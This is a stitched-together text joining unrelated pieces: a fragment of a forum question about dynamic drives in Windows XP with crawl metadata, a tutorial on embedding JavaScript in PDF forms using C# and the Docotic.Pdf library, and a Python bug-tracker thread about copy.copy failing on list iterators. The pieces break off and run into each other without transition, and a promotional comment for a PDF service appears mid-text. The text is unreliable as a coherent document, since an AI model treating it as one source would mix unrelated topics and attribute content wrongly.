Any idea?s ? I?ve read that dynamic drives are unreliable, maybe I shouldn?t have used it. I?d like to get the data off of it.
Thanks | http://www.techrepublic.com/forums/questions/dynamic-drive-in-xp/ | CC-MAIN-2014-41 | refinedweb | 510 | 80.62 |
It shouldn't take long for Javascript to be able to render PDF documents. Meanwhile, the somewhat opposite functionality - executing Javascript in PDF documents - is available for quite a long time already. This article is about this functionality.
Any software contains not only an actively used set of features but also a share of rarely used features. Sometimes latter set can be significant in size. You can think of features of Microsoft Word or your favorite IDE, for example. Most probably, there are enough features in them that you never used.. One of such features is the ability to use Javascript in PDF documents.
Javascript in PDF is most often used for the following tasks:
A Javascript API was developed for PDF viewers to be able to interpret Javascript code. The API was primarily developed for Adobe Acrobat family of products but alternative viewers usually also support a subset of the API.
Let's take a look at some samples.
Here is a traditional "Hello World" sample for a start. Please note that I'll use C# and Docotic.Pdf library for the samples. You can download source code of all the samples at the end of the article.
using BitMiracle.Docotic.Pdf;
namespace JavascriptInPdf
{
public static class Demo
{
public static void Main(string[] args)
{
PdfDocument pdf = new PdfDocument();
pdf.OnOpenDocument = pdf.CreateJavaScriptAction("app.alert(\"Hello CodeProject!\", 3);");
pdf.Save("Hello world.pdf");
}
}
}
You should see something like on the following screenshot if you open the PDF created by the sample in Adobe Reader:
So, what's done by the sample? Here is the essential line:
pdf.OnOpenDocument = pdf.CreateJavaScriptAction("app.alert(\"Hello CodeProject!\", 3);");
PDF supports actions. It is something that is done when an event occurs. For example, clicking on a link in a PDF document outline might trigger an action that cause viewer to open a page in the document:
There are different types of actions defined. One of the types is Javascript actions. An action of this type can be created using PdfDocument.CreateJavaScriptAction method. The method accepts Javascript code. Then the action can be attached to the OnOpenDocument event. Obviously, the event occurs when document is opened in a viewer.
PdfDocument.CreateJavaScriptAction
OnOpenDocument
Here is the Javascript code:
app.alert("Hello CodeProject!", 3);
Static class app is part of the Javascript API. This class provides methods for communicating with a PDF viewer. In particular, this class contains alert method with a number of overloads. The alert method can be used to present a modal window with a message. The code above uses the overload with optional second parameter. This parameter specifies an icon to be displayed (3 is a code for Status Icon).
app
alert
3
Let's try something more pragmatic.
There are many PDF documents with fillable forms. A document with a form can be a deposit account agreement, a visa application form, a questionnaire etc. Such documents can be conveniently filled right in a viewer and printed or saved for later use. Creators of such documents can employ Javascript to farther improve user experience.
Fillable forms often contain date fields. These fields might look like this:
Sure, a creator of a document can just add date field to the document and stop there. However, it would be nice to assist someone who will fill document later by putting current date to the date field. In most cases this will be just what is expected.
I won't go into details of how to create a date field. Let's focus on the Javascript part only. So, we need to put current date into a date field (there is three fields actually, one for day, month and year). Here is the script:
function setDay(date) {
var dayField = this.getField("day");
if (dayField.value.length == 0) {
dayField.value = util.printd("dd", date);
}
}
function setMonth(date) {
var monthField = this.getField("month");
if (monthField.value.length == 0) {
monthField.value = util.printd("date(en){MMMM}", date, true);
}
}
function setYear(date) {
var yearField = this.getField("year");
if (yearField.value.length == 0) {
yearField.value = util.printd("yyyy", date);
}
}
function setCurrentDate() {
var now = new Date();
setDay(now);
setMonth(now);
setYear(now);
}
setCurrentDate();
As you can see, there is much more code than in “Hello World” sample. Using a string for all this code is probably not very convenient because of need to escape quotes. And editing such code later might be painful because of lack of formatting. Let's put a text file with code into application resources and use another overload of CreateJavaScriptAction method.
CreateJavaScriptAction
pdf.OnOpenDocument = pdf.CreateJavaScriptAction(Resources.SetCurrentDate);
When opened, a document with the script should look like the following:
Take a closer look at following part of the code:
monthField.value = util.printd("date(en){MMMM}", date, true);
Please notice that I am using an overload of util.printd method to get localized name of the month. This works as expected in Adobe Reader but, unfortunately, other PDF viewers might not support all built-in methods of Javascript API. This should be taken into account if you are going to support anything other than Adobe Reader. Another approach is to implement custom code that does the same as util.printd.
util.printd
Please also notice that code populates a field only if it's empty. Without this additional check a following scenario might occur: a person fills the document, saves it but next time the document is opened all date fields are reset with current date.
Suppose you want to ensure that day and year are numbers. It's easy. Let's use following code for this:
function validateNumeric(event) {
var validCharacters = "0123456789";
for (var i = 0; i < event.change.length; i++) {
if (validCharacters.indexOf(event.change.charAt(i)) == -1) {
app.beep(0);
event.rc = false;
break;
}
}
}
validateNumeric(event);
PDF fields fire OnKeyPress event whenever something is typed in a field. You might want to create an action with the validation code and attach it to OnKeyPress event of fields.
OnKeyPress
PdfJavaScriptAction validateNumericAction = m_document.CreateJavaScriptAction(Resources.ValidateNumeric);
dayTextBox.OnKeyPress = validateNumericAction;
yearTextBox.OnKeyPress = validateNumericAction;
After that a person filling the form won't be able to put anything other than numbers in day and year fields. Anything getting pasted from clipboard will also be validated.
Quite often same data should be put several times in different parts of a form. In such cases some Javascript code can help to eliminate the need for this repetitive efforts.
Assume that there is a document like this:
It would be nice to have both fields synchronized.
It's possible with following Javascript method:
function synchronizeFields(sourceFieldName, destinationFieldName) {
var source = this.getField(sourceFieldName);
var destination = this.getField(destinationFieldName);
if (source != null && destination != null) {
destination.value = source.value;
}
}
The Javascript method could be used like this:
PdfDocument pdf = new PdfDocument("Names.pdf");
pdf.SharedScripts.Add(
pdf.CreateJavaScriptAction(Resources.SynchronizeFields)
);
pdf.GetControl("name0").OnLostFocus = pdf.CreateJavaScriptAction("synchronizeFields(\"name0\", \"name1\");");
pdf.GetControl("name1").OnLostFocus = pdf.CreateJavaScriptAction("synchronizeFields(\"name1\", \"name0\");");
pdf.Save("NamesModified.pdf");
This will ensure that data in both fields is the same at all times. The data is synchronized whenever any field looses focus. Please notice that synchronizeFields method is put is shared scripts collection (PdfDocument.SharedScripts). This is done to use the same code from several actions.
synchronizeFields
PdfDocument.SharedScripts
As you can see, Javascript can be used not only in web development. With some additional efforts a PDF form with Javascript code can be created. And such form could please those who will fill it almost like an application with a well thought-out UI.
Don't get me wrong, most important part of a PDF file is its content. Javascript is just a nice addition. And there are some imitations:
Also, Javascript in PDF files is a security threat. From time to time different vulnerabilities are found (and fixed) in viewers. Knowing all that don't be surprised if an opened PDF file will offer you a chess game to distract you from malicious acts getting performed in background. " />
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
To make a Fillable PDF Forms, please visit our website PDFfiller.com or you may follow this link - <a href=""></a>[<a href="" target="_blank" title="New Window">^<!
General News Suggestion Question Bug Answer Joke Praise Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages. | https://www.codeproject.com/Articles/380293/Javascript-in-PDF?msg=4244542 | CC-MAIN-2017-30 | refinedweb | 1,408 | 58.58 |
Herwin .
- Registered on: 07/18/2011
- Last connection: 07/09/2015
Activity
Reported issues: 14
06/02/2015
- 03:56 PM Ruby trunk Feature #11210 (Open): IPAddr has no public method to get the current subnet mask
- Both to_s and to_string omit the subnet mask of an IP address. The only way to query it via public methods is to manu...
01/15/2015
- 04:26 PM Ruby trunk Bug #10745 (Rejected): Special combinations of parameters in assert_equal (test/unit) may cause e...
- ~~~ruby
require 'test/unit'
require 'ipaddr'
class TestX < Test::Unit::TestCase
def test_x
assert_equal(...
08/28/2014
- 10:54 AM Ruby trunk Bug #10180 (Rejected): #to_hash vs. #to_h
- The class Hash has a method try_convert, that is documented as "Try to convert obj into a hash, using #to_hash method...
07/17/2014
- 09:50 AM Ruby trunk Feature #10052: Add parameter non_block (defaults to false) on SizedQueue#push
- The following patch should do the trick.
Another thing to consider in this file: don't mix up tabs and spaces. The...
- 08:59 AM Ruby trunk Feature #10052 (Closed): Add parameter non_block (defaults to false) on SizedQueue#push
- The implementations of Queue and SizedQueue have a method pop, where a parameter non_block would make the call raise ...
07/15/2014
- 11:08 AM Ruby trunk Bug #10035: Find.find no longer accepts Pathname type as argument
- It works in ruby-2.0.0-p481.
If you compare the files lib/find.rb from both versions, you can see that some code f...
07/14/2014
- 12:21 PM Ruby trunk Bug #10035 (Closed): Find.find no longer accepts Pathname type as argument
- In 2.1, a check for encoding of the paths parameter has been added to File.find. This works perfectly well for String...
04/14/2014
- 07:28 AM Ruby trunk Feature #9379: Support for using libxml-ruby as XML parser in xmlrpc-libs
- I guess support for Nokogiri will be possible as well, I just needed something more efficient than REXML and libXML w...
01/08/2014
- 12:32 AM Ruby trunk Feature #9379 (Closed): Support for using libxml-ruby as XML parser in xmlrpc-libs
- The default backend in the XMLRPC parser is REXML. This should work at most occasions, but it definitely isn't the fa...
01/06/2014
- 10:41 PM Ruby trunk Feature #9371 (Open): Remove NQXML from xmlrpc/parser
- In lib/xmlrpc/parser.rb a number of parsing backends exist. One of them uses the library nqxml. There is no gem for t... | https://bugs.ruby-lang.org/users/3395 | CC-MAIN-2015-32 | refinedweb | 423 | 72.97 |
Java Reflection in Action, Part 2
Editor's Note: This piece picks up where the article Java Reflection in Action left off.]
1.5 Representing types with class objects
The discussion of the methods from table 1 indicates that Java reflection uses instances of Class to represent types. For example, getMethod from listing 1 uses an array of Class to indicate the types of the parameters of the desired method. This seems fine for methods that take objects as parameters, but what about types not created by a class declaration?
Table 1.1 The methods defined by Class for method query
Consider listing 2, which shows a fragment of java.util.Vector. One method has an interface type as a parameter, another an array, and the third a primitive. To program effectively with reflection, you must know how to introspect on classes such as Vector that have methods with such parameters.
Listing 2 A fragment of java.util.Vector.
public class Vector ... { public synchronized boolean addAll( Collection c ) ... public synchronized void copyInto( Object[] anArray ) ... public synchronized Object get( int index ) ... }
Java represents primitive, array, and interface types by introducing class objects to represent them. These class objects cannot do everything that many other class objects can. For instance, you cannot create a new instance of a primitive or interface. However, such class objects are necessary for performing introspection. Table 2 shows the methods of Class that support type representation.
Table 2 Methods defined by Class that deal with type representation
The rest of this section explains in greater detail how Java represents primitive, interface, and array types using class objects. By the end of this section, you should know how to use methods such as getMethod to introspect on Vector.class for the methods shown in listing 2.
Page 1 of 3
| http://www.developer.com/java/web/article.php/3507696/Java-Reflection-in-Action-Part-2.htm | CC-MAIN-2017-09 | refinedweb | 302 | 57.27 |
Template talk:USB Device Data
Hi, I would like to add/change information regarding some DVB-T usb sticks, but I don't have the edit button on this page. The "view source" page shows me this error message: "You do not have permission to edit pages in the Template namespace." --Basic.Master 11:51, 24 March 2012 (CET)
Can't add infos about 1b80:d3a4 Afatech - here they are
I wanted to add infos about the DVB-T stick "1b80:d3a4" but couldn't as I don't have write access in the template namespace. Klaush 17:21, 1 March 2013 (CET)
Anyway, here are the infos I wanted to add, maybe someone with write access to the Template namespace can add this (hope I got the template filled out correctly):
auvisio DV-Stick 252.pro 1b80:d3a4 (shown as Afatech)
The data for the device auvisio DV-Stick 252.pro.) | https://www.linuxtv.org/wiki/index.php?title=Template_talk:USB_Device_Data&oldid=32033 | CC-MAIN-2017-17 | refinedweb | 152 | 61.19 |
import "github.com/Rolinh/errbag"
Package errbag implements an error rate based throttler. It can be used to limit function calls rate once a certain error rate threshold has been reached.
const ( // StatusThrottling indicates the errbag is throttling. StatusThrottling = iota // StatusOK indicates that all is well. StatusOK )
CallbackFunc is used as an argument to the Record() method.
ErrBag is very effective at preventing an error rate to reach a certain threshold. leakInterval. leakInterval corresponds to the time to wait, in milliseconds, before an error is discarded from the errbag. It must be equal or greater than 100, otherwise throttling will be ineffective.
Deflate needs to be called when the errbag is of no use anymore. Calling Record() with a deflated errbag will induce a panic.
Inflate needs to be called once to prepare the ErrBag. Once the ErrBag is not needed anymore, a proper call to Deflate() shall be made..
Package errbag imports 2 packages (graph) and is imported by 2 packages. Updated 2018-11-26. Refresh now. Tools for package owners. | https://godoc.org/github.com/Rolinh/errbag | CC-MAIN-2018-51 | refinedweb | 172 | 59.4 |
Hello Experts ..
Switch operator, complete code fragment below; What am I doing wrong ?
I expect I can turn the Switch operator on and off, repeatedly, and am trying to develop an application to demonstrate this. What the complete code fragment below currently does is; zero output until (approx) 3 minutes, then all output arrives at once.
fyi: the FileSource for the control port, for testing only, I was expecting to echo single tuples to that file, switch on, switch off, repeat.
What am I doing wrong ?
namespace Namespace13_Switch;
composite SW01_Switch01 { graph
stream<rstring My_String> My_Switch = Switch (My_DataInput; My_ControlInput) { param status : true; initialStatus : true; } () as My_Sink = FileSink(My_Switch) { param file : "01.OutputFile.txt"; format : line; flush : 1u; }
stream<rstring My_String> My_FileRead1 = FileSource() { param // This fellow is 20 MB, 10,000 lines. file : "01.InputFile.txt"; format : line; } stream<rstring My_String> My_DataInput = Throttle(My_FileRead1) { param rate: 100.0; }
stream<rstring My_String> My_FileRead2 = FileSource() { param file : "01.InputFile.ControlFile_Hot.txt"; format : line; hotFile : true; }
}
Answer by James Cancilla (276) | Feb 16, 2014 at 09:23 PM
Hi Daniel,
A couple of things. First, in the code you pasted, the output port of the second FileSource isn't connected to the control port of the Switch (you may have pasted some old code).
That being said, even with the FileSource connected, you will not be able to toggle the switch on and off like you want. What happens with the Switch is, whenever a tuple is received on the control port, the expression defined on the status parameter is evaluated. If the expression evaluates to true, the switch is closed (i.e. tuples flow). If false, the switch is opened (i.e. tuples are blocked). Since you have the status expression set to "true", no matter how many tuples you send to the control port, the switch will remain closed.
If you want to be able to toggle that switch on and off, you need to define an actual expression that will end up being evaluated to either true or false.
For example, I modified your Switch operator to use evaluate the value of the String on the tuple coming into the control port:
stream<rstring My_String> My_Switch = Switch(My_DataInput ; My_FileRead2) { param status : (My_FileRead2.My_String == "true") ; }
Now, all you need to do is append "true" to the hot file in order to close the switch or "false" (or anything except "true") to cause the switch to open.
You also mentioned that you don't want any tuples to flow for 3 minutes. Since you have 'initalStatus' set to true, it means the switch will be closed and tuples will begin flowing as soon as the application starts. If you don't want tuples to initially start flowing, set the initalStatus to false (or don't add param at all because the default is false).
I hope this information helps. Let me know if you have any other questions.
Answer by DanielFarrell (72) | Feb 16, 2014 at 10:02 PM
Thanks James !!
Exactly what I needed !
namespace Namespace13_Switch;
composite SW01_Switch01 { graph
// ////////////////////////////////////////////////////// // //////////////////////////////////////////////////////
stream<rstring My_String> My_Switch = Switch (My_DataInput; My_ControlInput) { param // // This expression is evaluated. True means the // switch is closed, and data will flow. // status : (My_ControlInput.My_String == "TURN_ON") ; // // Whether the switch starts closed/true (let data // flow), or open/false (do not let data flow). The // default is false (do not let data flow). // initialStatus : true; }
() as My_Sink = FileSink(My_Switch) { param file : "/My_Stuff/My_Files/13_Switch/" + "01.OutputFile.txt"; // format : line; flush : 1u; }
stream<rstring My_String> My_FileRead1 = FileSource() { param file : "/My_Stuff/My_Files/13_Switch/" + "01.InputFile.WebLog.10000Lines.txt"; format : line; }
// // A throttle. Not required, only added so that this // application doesn't speed by so fast, you can't see // it operate. // stream<rstring My_String> My_DataInput = Throttle(My_FileRead1) { param rate: 100.0; }
// // The input to the control port of our switch. Notice // we made this a 'hot' file, so we can append to it as // this Streams application is running. // // If this weren't a hot file, Streams would see the // EOF marker and never again seek to retrieve data // from this file. As a hot file, Streams will periodically // check for new input. // stream<rstring My_String> My_ControlInput = FileSource() { param file : "/My_Stuff/My_Files/13_Switch/" + "01.InputFile.ControlFile_Hot.txt"; format : line; // hotFile : true; }
}
No one has followed this question yet.
How to implement WordCount on Streams? 1 Answer
Import/Export implementation in Java Primitive Operator + Import/Export mechanism 2 Answers
How to deal with "import com.ibm.streamsx.dps.*"? 1 Answer
How to fix a TCPSource server operator that keeps connection in CLOSE_WAIT state 1 Answer
SPL::map quick copy - what's fastest? 2 Answers | https://developer.ibm.com/answers/questions/7932/switch-operator-what-am-i-doing-assuming-wrong.html | CC-MAIN-2019-43 | refinedweb | 767 | 64 |
45351/how-do-i-use-the-enumerate-function-inside-a-list
If there is list =[1,2,4,6,5] then use ...READ MORE
Hi, it is pretty simple, to be ...READ MORE
You can use sleep as below.
import time
print(" ...READ MORE
Hey, @Subi,
Regarding your query, you can go ...READ MORE
Hello @kartik,
import operator
To sort the list of ...READ MORE
suppose you have a string with a ...READ MORE
You can also use the random library's ...READ MORE
Syntax :
list. count(value)
Code:
colors = ['red', 'green', ...READ MORE
In Python "list" is the class that ...READ MORE
OR
At least 1 upper-case and 1 lower-case letter
Minimum 8 characters and Maximum 50 characters
Already have an account? Sign in. | https://www.edureka.co/community/45351/how-do-i-use-the-enumerate-function-inside-a-list?show=156479 | CC-MAIN-2022-40 | refinedweb | 127 | 79.16 |
The QCoreApplication class provides an event loop for console Qt applications. More...
#include <QCoreApplication>
Inherits QObject.
Inherited by QApplication. command line arguments which QCoreApplication's constructor should be called with are accessible using arguments(). The event loop is started with a call to exec(). Long running operations can call processEvents() to keep the application responsive... pointed to by argc and argv must stay valid for the entire lifetime of the QCoreApplication object.
Destroys the QCoreApplication object.().
Appends path to the end of the library path list. If path is empty or already in the path list, the path list is not changed.
The default path list consists of a single entry, the installation directory for plugins. The default installation directory for plugins is INSTALL/plugins, where INSTALL is the directory where Qt was installed.
See also removeLibraryPath(), libraryPaths(), and setLibraryPaths().().
Returns the file path of the application executable.
For example, if you have installed Qt in the /usr/local/qt directory, and you run the regexp example, this function will return "/usr/local/qt/examples/tools/regexp/regexp".
Warning: On Unix, this function assumes that argv[0] contains the file name of the executable (which it normally does). It also assumes that the current directory hasn't been changed by the application.
See also applicationDirPath().
Returns the list of command-line arguments.
arguments().at(0) is the program name, arguments().at(1) is the first argument, and arguments().last() is the last argument. i.e. Japanese command line arguments on a system that runs in a latin1 locale. Most modern Unix systems do not have this limitation, as they are Unicode based.
On NT-based Windows, this limitation does not apply either.
This function was introduced in Qt 4.1.
Returns true if the application objects are being destroyed; otherwise returns false.
See also startingUp(). QApplication::exec().().
Sends message through the event filter that was set by setEventFilter(). If no event filter has been set, this function returns false; otherwise, this function returns the result of the event filter function in the result parameter.
See also setEventFilter().().
This function returns true if there are pending events; otherwise returns false. Pending events can be either from the window system or posted events using postEvent().
See also QAbstractEventDispatcher::hasPendingEvents().
Adds the translation file translationFile to the list of translation files to be used for translations.
Multiple translation files can be installed. Translations are searched for in the last installed translation file on, back to the first installed translation file. The search stops as soon as a matching translation is found.
See also removeTranslator(), translate(), and QTranslator::load().
Returns a pointer to the application's QCoreApplication (or QApplication) instance. .().
This is an overloaded member function, provided for().
This is an overloaded member function, provided for convenience.().
Removes path from the library path list. If path is empty or not in the path list, the list is not changed.
See also addLibraryPath(), libraryPaths(), and setLibraryPaths()..
This is an overloaded member function, provided for convenience..
Removes the translation file translationFile from the list of translation files used by this application. (It does not delete the translation file from the file system.)
See also installTranslator(), translate(), and QObject::tr().().
Immediately dispatches all events which have been previously queued with QCore.
See also flush() and postEvent().
This is an overloaded member function, provided for convenience..
The function can return true to stop the event to be processed by Qt, or false to continue with the standard event processing.
Only one filter can be defined, but the filter can use the return value to call the previously set event filter. By default, no filter is set (i.e., the function returns 0).()..
See also QObject::tr(), installTranslator(), and QTextCodec::codecForTr().
This is an overloaded member function, provided for convenience.(). | https://doc.qt.io/archives/qtopia4.3/qcoreapplication.html | CC-MAIN-2021-10 | refinedweb | 631 | 52.46 |
#include <vtkSmoothPolyDataFilter.h>
Inheritance diagram for vtkSmoothPolyDataFilter:
vtkSmoothPolyDataFilter.h is a filter that adjusts point coordinates using Laplacian smoothing. The effect is to "relax" the mesh, making the cells better shaped and the vertices more evenly distributed. Note that this filter operates on the lines, polygons, and triangle strips composing an instance of vtkPolyData. Vertex or poly-vertex cells are never modified.
The algorithm proceeds as follows. For each vertex v, a topological and geometric analysis is performed to determine which vertices are connected to v, and which cells are connected to v. Then, a connectivity array is constructed for each vertex. (The connectivity array is a list of lists of vertices that directly attach to each vertex.) Next, an iteration phase begins over all vertices. For each vertex v, the coordinates of v are modified according to an average of the connected vertices. (A relaxation factor is available to control the amount of displacement of v). The process repeats for each vertex. This pass over the list of vertices is a single iteration. Many iterations (generally around 20 or so) are repeated until the desired result is obtained.
There are some special instance variables used to control the execution of this filter. (These ivars basically control what vertices can be smoothed, and the creation of the connectivity array.) The BoundarySmoothing ivar enables/disables the smoothing operation on vertices that are on the "boundary" of the mesh. A boundary vertex is one that is surrounded by a semi-cycle of polygons (or used by a single line).
Another important ivar is FeatureEdgeSmoothing. If this ivar is enabled, then interior vertices are classified as either "simple", "interior edge", or "fixed", and smoothed differently. (Interior vertices are manifold vertices surrounded by a cycle of polygons; or used by two line cells.) The classification is based on the number of feature edges attached to v. A feature edge occurs when the angle between the two surface normals of a polygon sharing an edge is greater than the FeatureAngle ivar. Then, vertices used by no feature edges are classified "simple", vertices used by exactly two feature edges are classified "interior edge", and all others are "fixed" vertices.
Once the classification is known, the vertices are smoothed differently. Corner (i.e., fixed) vertices are not smoothed at all. Simple vertices are smoothed as before (i.e., average of connected vertex coordinates). Interior edge vertices are smoothed only along their two connected edges, and only if the angle between the edges is less than the EdgeAngle ivar.
The total smoothing can be controlled by using two ivars. The NumberOfIterations is a cap on the maximum number of smoothing passes. The Convergence ivar is a limit on the maximum point motion. If the maximum motion during an iteration is less than Convergence, then the smoothing process terminates. (Convergence is expressed as a fraction of the diagonal of the bounding box.)
There are two instance variables that control the generation of error data. If the ivar GenerateErrorScalars is on, then a scalar value indicating the distance of each vertex from its original position is computed. If the ivar GenerateErrorVectors is on, then a vector representing change in position is computed.
Optionally you can further control the smoothing process by defining a second input: the Source. If defined, the input mesh is constrained to lie on the surface defined by the Source ivar.
Definition at line 132 of file vtkSmoothPolyDataFilter.h. | https://vtk.org/doc/release/4.0/html/classvtkSmoothPolyDataFilter.html | CC-MAIN-2021-31 | refinedweb | 572 | 57.47 |
An implementation of disposable for Dart.
Introduction
Software should be like Kleenex, strong and disposable!
- Gotta have
Dart:
This library originated as a mechinism for cleaning up resources when you're done with them.
Features
- IDisposable - interface
IAsyncDisposable - interface
Disposable - class
AsyncDisposable - class
CompositeDisposable - class
using - global function
- usingAsync - global function
40+ unit tests provide more detailed examples of usage!
Getting Started
1\. Add the following to your project's pubspec.yaml and run
pub install.
dependencies: disposable: any
2\. Add the correct import for your project.
import 'package:disposable/disposable.dart';
3\. Start using.
Naive/pointless example:
var recPort = new ReceivePort(); // Use the default constructor of both Disposable and AsyncDisposable // to do the closing, nulling and other cleanup needed.2 ish
Tech
Dart- Dartlang.org: get the JS out!
Disposable- An implementation of disposable for Dart.
Installation
License
Edited
- 26-April-2013 initial release
- 28-April-2013 bumped to 0.1.0
- 05-May-2013 updated packages and minor doc update
- 06-July-2013 fixed some async disposable tests
Credits
- Vizidrix
- Perry Birch | https://www.dartdocs.org/documentation/disposable/0.1.2/index.html | CC-MAIN-2017-26 | refinedweb | 174 | 52.56 |
Difference between order.executed.price and order.executed.value
In the quickstart documentation, I see in the notify_order function the values order.executed.price and order.executed.value, what is the difference between the two?
In the output, it seems that they always have the same values.
The default stake size is
1and it's a stock. Price and value are bound to be the same.
Thank you for your answer. I have one additional question.
In the documentation, it seems that Price and Cost are the same whether it is an executed buy or sell.
However, when I ran the code from my laptop, it seems that when the order is an Executed Sell, the cost is equal to the price of the associated buy. Is it normal?
Even if you believe in the power of magic ... nobody can know what you have executed.
Sorry for the lack of clarity. Here's my code (it is simply the code from the documentation with Facebook data):
from __future__ import (absolute_import, division, print_function, unicode_literals) import datetime # For datetime objects import os.path # To manage paths import sys # To find out the script name (in argv[0]) import backtrader as bt self.order = None def notify_order(self, order): if order.status in [order.Submitted, order.Accepted]: return]) if self.order: return if not self.position: if self.dataclose[0] < self.dataclose[-1]: if self.dataclose[-1] < self.dataclose[-2]: self.log('BUY CREATE, %.2f' % self.dataclose[0]) self.order = self.buy() else: if len(self) >= (self.bar_executed + 5): self.log('SELL CREATE, %.2f' % self.dataclose[0]) self.order = self.sell() if __name__ == '__main__': # Create a cerebro entity cerebro = bt.Cerebro() # Add a strategy cerebro.addstrategy(TestStrategy) # Datas are in a subfolder of the samples. Need to find where the script is # because it could have been called from anywhere # modpath = os.path.dirname(os.path.abspath(sys.argv[0])) # datapath = os.path.join(modpath, '../../datas/orcl-1995-2014.txt') datapath = 'FB.csv' # Create a Data Feed data = bt.feeds.YahooFinanceCSVData( dataname=datapath, # Do not pass values before this date fromdate=datetime.datetime(2018, 1, 1), # Do not pass values before this date todate=datetime.datetime(2018, 1, 30), # Do not pass values after this date reverse=False) # Add the Data Feed to Cerebro cerebro.adddata(data) # Set our desired cash start cerebro.broker.setcash(100000.0) cerebro.broker.setcommission(commission=0.001) # Print out the starting conditions print('Starting Portfolio Value: %.2f' % cerebro.broker.getvalue()) # Run over everything cerebro.run() # Print out the final result print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue())
Lesson number 1 for algotrading (taught in chess and good for life in general)
Look at what you have right in front of your nose. (You can also formulate it like: "Pay attention to details")
Which means that if you open this forum, each and every time, you will see the following at the top
For code/output blocks: Use ``` (aka backtick or grave accent) in a single line before and after the block. See:
Changing.
I would have to find the discussion and commit, but I recall the semantics of value were changed early in the development phase. The sell order would return the value which would have been acquired plus the pnl. | https://community.backtrader.com/topic/1880/difference-between-order-executed-price-and-order-executed-value | CC-MAIN-2021-04 | refinedweb | 545 | 52.46 |
On 08/03/2012 04:51 PM, Igor Galić wrote:
>
>
> Right now, is your library meant to be linked with mod_lua
> or does it work with LoadFile?
It's a Lua library, so it doesn't involve httpd per se.
It would be included by mod_lua (or rather, by Lua) by writing the
following in your script:
local ap = require "aplua"
function handler(r)
ap.somestuff(r) -- do some AP stuff here
end
>
> If you were planning to integrate it into the httpd project,
> would you as above, or would it become part of mod_lua?
> (From what I gather, it wouldn't make mod_lua more "bloated")
The only "bloat" you'd get is the extra microsecond it will take to
register the functions in Lua. All the functionality is yanked straight
from httpd (which has already loaded apr, pcre etc itself), so there's
no additional memory use by including them. The only "concern", if you
will, is that there will be more functions to document.
>
> Finally, I'd like to say that all the httpd stuff is probably
> fine, the APR stuff though is a) Not namespaced as apr, and
> might be misplaced. I'm probably not competent enough to comment
> on this one, though.
>
Yes, we could create a global table, ap, for the ap stuff, and apr for
the apr stuff, or just make a table for apr, and have the rest
registered within the request_rec table.
>
> I cannot seem to be able to find this stuff…
>
The other examples I mentioned will be available in the developer docs,
as soon as I've finished making it somewhat organized.
With regards,
Daniel. | http://mail-archives.apache.org/mod_mbox/httpd-dev/201208.mbox/%[email protected]%3E | CC-MAIN-2014-15 | refinedweb | 275 | 74.73 |
Created on 2019-12-17 23:37 by andrewni, last changed 2019-12-18 17:48 by ethan.furman. This issue is now closed.
import os
import pathlib
import enum
class MyEnum(str, enum.Enum):
RED = 'red'
# this resolves to: '/Users/niandrew/MyEnum.RED'
# EXPECTED: '/Users/niandrew/red'
str(pathlib.Path.home() / MyEnum.RED)
# this resolves to: '/Users/niandrew/red'
os.path.join(pathlib.Path.home(), MyEnum.RED)
As per the fspath PEP the below precedence is set. So for the enum inheriting from str the object itself is returned and MyEnum.RED.__str__ is used returning MyEnum.RED. You can remove inheritance from str and implement __fspath__ for your enum class to be used as per fspath protocol.
> If the object is str or bytes, then allow it to pass through with
an incremented refcount. If the object defines __fspath__(), then
return the result of that method. All other types raise a TypeError.
# bpo39081.py
import os
import pathlib
import enum
class MyEnum(enum.Enum):
RED = 'red'
def __fspath__(self):
return self.name
print(os.fspath(MyEnum.RED))
print(pathlib.Path.home() / MyEnum.RED)
$ python3.8 bpo39081.py
RED
/Users/kasingar/RED
Karthikeyan is right and this is working as expected. If you want the semantics you're after you can either implement __fspath__ as was suggested or get the 'value' attribute of the enum when constructing your path.
The other option is to continue to inherit from `str`, but override the `__str__` method:
class MyEnum(str, enum.Enum):
#
def __str__(self):
return self.value | https://bugs.python.org/issue39081 | CC-MAIN-2021-21 | refinedweb | 256 | 60.51 |
Created on 2012-03-17 19:04 by Jakob.Bowyer, last changed 2015-11-12 10:05 by serhiy.storchaka. This issue is now closed.
Running:
Python 2.7.2 (default, Jun 12 2011, 14:24:46) [MSC v.1500 64 bit (AMD64)]
Code:
import copy
copy.copy(iter([1,2,3]))
Exception:
---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
T:\languages\Python27\Scripts\<ipython-input-2-4b0069a09ded> in <module>()
----> 1 copy.copy(iter([1,2,3]))
T:\languages\Python27\lib\copy.pyc in copy(x)
94 raise Error("un(shallow)copyable object of type %s" % cl
s)
95
---> 96 return _reconstruct(x, rv, 0)
97
98
T:\languages\Python27\lib\copy.pyc in _reconstruct(x, info, deep, memo)
327 if deep:
328 args = deepcopy(args, memo)
--> 329 y = callable(*args)
330 memo[id(x)] = y
331
T:\languages\Python27\lib\copy_reg.pyc in __newobj__(cls, *args)
91
92 def __newobj__(cls, *args):
---> 93 return cls.__new__(cls, *args)
94
95 def _slotnames(cls):
TypeError: object.__new__(listiterator) is not safe, use listiterator.__new__()
Either this is a bug or not a clear error message in the exception
I get a normal exception.
I see ipython at the top level in 'T:\languages\Python27\Scripts\<ipython-input-2-4b0069a09ded> in <module>()'
Perhaps you ran ipython accidentally?
@Ramchandra: I think you referring to the traceback format (which is indeed less useful than a normal Python traceback in the context of this tracker). The OP, however, is referring to the exception itself:
TypeError: object.__new__(listiterator) is not safe, use listiterator.__new__()
This is indeed a bit unexpected, though I don't know that copying iterators is actually supported.
C:\Users\Jakob>python -c "import copy; copy.copy(iter([1,2,3]))"
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "T:\languages\Python27\lib\copy.py", line 96, in copy
return _reconstruct(x, rv, 0)
File "T:\languages\Python27\lib\copy.py", line 329, in _reconstruct
y = callable(*args)
File "T:\languages\Python27\lib\copy_reg.py", line 93, in __newobj__
return cls.__new__(cls, *args)
TypeError: object.__new__(listiterator) is not safe, use listiterator.__new__()
C:\Users\Jakob>python3 -c "import copy; copy.copy(iter([1,2,3]))"
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "T:\languages\Python32\lib\copy.py", line 97, in copy
return _reconstruct(x, rv, 0)
File "T:\languages\Python32\lib\copy.py", line 285, in _reconstruct
y = callable(*args)
File "T:\languages\Python32\lib\copyreg.py", line 88, in __newobj__
return cls.__new__(cls, *args)
